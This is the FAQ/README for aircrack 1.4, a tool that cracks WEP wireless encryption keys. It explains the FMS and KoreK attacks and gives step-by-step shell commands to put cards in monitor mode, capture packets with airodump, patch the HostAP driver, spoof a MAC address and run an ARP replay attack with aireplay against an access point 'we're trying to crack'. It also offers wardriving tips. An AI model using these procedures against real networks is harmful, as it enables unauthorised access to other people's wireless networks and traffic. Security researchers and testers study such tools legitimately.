

    --[ What is aircrack ?
      
aircrack is a 802.11 WEP key cracker.  It implements the so-called
Fluhrer-Mantin-Shamir (FMS) attack, along with some new attacks by
a talented hacker named KoreK.  When enough encrypted packets have
been gathered, aircrack can almost instantly recover the WEP key.


    --[ How does aircrack work ?

Every WEP encrypted packet has an associated 3-byte initialization
vector (IV). Some IVs leak information about a certain byte of the
key, thus  statistically the correct key emerges when a sufficient
number of IVs have been collected.


    --[ How many packets are needed for recovering a WEP key ?

It really depends on your luck and the way the IVs are distributed.
Most  of the time, 1M unique IVs (thus ~2M packets) are enough. If
you're very lucky only 500K IVs may be required; and if you're out
of luck you could need around 1.5M-2M unique IVs.


    --[ Is aircrack different from AirSnort ?

It it much more efficient. AirSnort requires more than two million
unique IVs to crack a 104-bit WEP key, whereas aircrack only needs
twice less IVs. Additionnaly, post-2002 wifi equipments filter the
"interesting" IVs  AirSnort relies on; on the other hand, aircrack
can break a WEP key without the need for said IVs.


    --[ How do I capture packets ?

First of all, you have to put the wireless interface in monitoring
mode; for example, if you have a Prism2 card and use linux-wlan-ng:

# wlanctl-ng wlan0 lnxreq_ifstate ifstate=enable
# wlanctl-ng wlan0 lnxreq_wlansniff enable=true channel=<AP channel>
# ifconfig wlan0 up
# airodump wlan0 fcap

Alternatively, if you use the more stable & friendly hostap driver:

# iwconfig wlan0 mode Monitor
# iwconfig wlan0 channel <AP channel>
# iwconfig wlan0 sensitivity 3
# iwpriv wlan0 monitor_type 1
# ifconfig wlan0 up
# airodump wlan0 wlancap

I'd recommend you use airodump instead of  tcpdump, because it can
handle large (> 2 GB) capture  files, and displays more meaningful
information about each AP (ESSID, total # of unique IVs ...). Note
that you can run both airodump and Kismet at the same time, but in
this case it is suggested to lock channel hopping ('L' in Kismet).
For wardriving purposes, I've included a shell script (chopper.sh)
you can use to hop between 11b/11g channels.


    --[ How can I run aircrack in the background ?

For this purpose, you may use the "screen" program.

    . Starting a new session: screen -t title
    . Detaching a session: Ctrl-a <release> d
    . Reattaching a session:  screen -r


    --[ How do I know when aircrack finds the key ?

Your screen will look like:

    ------------------------------------------------------------------

                                 aircrack 1.4

   * Got 1207486  unique IVs | fudge factor = 2
   * Elapsed time [00:00:07] | tried 1 keys at 8 k/m

   KB    depth   votes
    0    0/  1   C7( 202) 1D(  18) 16(  16) 24(  15) 29(  15) 6F(  15)
    1    0/  1   3F( 307) 44(  33) 1E(  21) 41(  15) 42(  15) 45(  15)
    2    0/  1   57( 245) 0E(  27) 15(  15) DA(  15) FA(  15) 55(  12)
    3    0/  1   A7( 139) 59(  36) 9D(  24) F6(  18) A4(  16) 10(  15)
    4    0/  1   71( 181) AB(  72) F7(  25) FB(  22) 2A(  16) 0A(  15)
    5    0/  1   F9( 129) 32(  60) 14(  28) 73(  28) CF(  27) 71(  20)
    6    0/  2   8F( 154) 71( 120) 30(  56) 72(  27) F0(  23) 80(  17)
    7    0/  1   41( 206) CC(  28) 34(  15) CA(  15) CB(  15) CE(  15)
    8    0/  1   EA( 207) 2D(  66) 7E(  30) 82(  24) 92(  15) CA(  15)
    9    0/  1   0C( 290) 37(  56) 99(  54) 15(  33) 9B(  27) F0(  22)
   10    0/  1   BF( 360) 76(  40) 93(  37) 1E(  33) 20(  26) 8C(  25)
   11    0/  2   D3(  98) 51(  67) 0F(  47) 53(  45) C0(  35) 55(  34)
   12    0/  1   64(1394) 9A( 225) 6F( 199) 19( 195) BB( 185) 94( 148)

                 KEY FOUND! [C7:3F:57:A7:71:F9:8F:41:EA:0C:BF:D3:64]

    ------------------------------------------------------------------

    --[ I've got x million packets but aircrack doesn't find the key !

WEP cracking is _not_ an exact science.  Sometimes luck is on your
side, and sometimes not. By gathering as many encrypted packets as
possible,  you'll greatly increase your chances of finding the key.
Also, try adding "-s 1"  or raise the fudge factor. In last resort,
send me an email (cf. http://www.cr0.net:8040/about/).


    --[ There's not enough wireless traffic, what can I do ?

One  possibility is to launch a replay attack based on arp-request
packets. Although  we cannot say for sure  that a packet is one of
those  (since the data is encrypted),  such packets  have a  fixed
length and can be spotted easily. By resending these packets again
and again, the other host will respond with encrypted replies thus
providing new and possibly weak IVs.

First of all, you have to sniff long enough to get some  potential
arp-request packets. Then you'll need two wireless cards: card  #0
will resend the packets over the air, and card #1 will monitor the
encrypted replies.

If you are far from the Access Point, I suggest you use two strong
directionnal antennas and wireless cards with a high output power;
otherwise you'll mostly see the very packets that you're resending.

The tricky  part is that it's quite a pain in the ass to  send raw
data frames with Prism2 cards. You can't do it in monitoring  mode
because the braindead chipset will trash the 802.11  header. So to
achieve our goal we are going to use HostAP's wlan0ap interface in
Master mode on the same channel as the legitimate AP  we're trying
to crack (thanks to the guy who wrote airpwn for this tip).

    * Step 1: patch and recompile HostAP

# wget http://hostap.epitest.fi/releases/hostap-driver-0.2.4.tar.gz
# tar -xvzf hostap-driver-0.2.4.tar.gz
# cd hostap-driver-0.2.4
# patch -Np1 -i ../aircrack-1.4/rawsend.patch
# make && make install
# /etc/init.d/pcmcia restart

    * Step 2: Start the attack

# iwpriv wlan0 hostapd 1
# iwpriv wlan0ap host_encrypt 1
# iwpriv wlan0ap host_decrypt 1
# iwconfig wlan0ap retry 1
# iwconfig wlan0ap mode Master
# iwconfig wlan0ap key 01:02:04:08:10
# iwconfig wlan0ap channel <AP channel>
# ifconfig wlan0 hw ether <some random MAC>
# ifconfig wlan0ap up
# aireplay wlan0ap replay.pcap

On a side note, the  "magic" WEP key above simply tells HostAP not
to re-encrypt outgoing data packets.

# iwconfig wlan1 mode Monitor
# iwconfig wlan1 channel <AP channel>
# iwpriv wlan1 monitor_type 0
# ifconfig wlan1 up
# airodump wlan1 replies


    --[ Special thanks to:

        * Jouni Malinen for developing the hostap driver
        * Dag Wieers for producing RPM packages of aircrack
        * KoreK for sharing the code of his WEP attacks
        * Erik Winkler for his help in testing and debugging
        * aminal for helping me solve the check_wepkey bug
        * Konstantin Gavrilenko for sending me a copy of Wi-Foo
        * b0nk for his work on optimizing the aireplay attack
        * and many other people... (you know who you are).


